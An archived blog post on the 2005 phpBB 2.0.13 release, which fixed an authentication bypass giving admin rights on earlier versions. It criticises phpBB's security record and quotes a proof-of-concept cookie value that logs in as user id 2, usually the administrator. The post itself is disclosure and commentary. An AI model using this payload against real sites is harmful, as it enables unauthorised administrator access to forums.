This post was imported from an old blog archive, and predates the creation of AdamCaudill.com.

In the latest round of embarrassing updates, the phpBB Group has released a new version of phpBB, 2.0.13, to fix a large, and obvious security error allow anyone to gain admin rights, oh, just to make it better, it works on all version < 2.0.13. With a POC floating around, let the hacking begin.

Update: A working exploit was released, showing just how simple it is to wreak havoc.

This is yet another blow to phpBB, it’s had a number of recent issues like this, makes you wonder how long it’ll take for them to actually take security seriously.

An exploit is not required.

The following proof of concept demonstrating cookie values necessary to authenticate to the numerical id ‘2’ account, typically the administrator account, is available:

a%3A2%3A%7Bs%3A11%3A%22autologinid%22%3Bb%3A1%3Bs%3A6%3A%22userid%22%3Bs%3A1%3A%222%22%3B%7D

(Source)

PHPBB Authentication Bypass Vulnerability
phpBB 2.0.13 released – Critical Update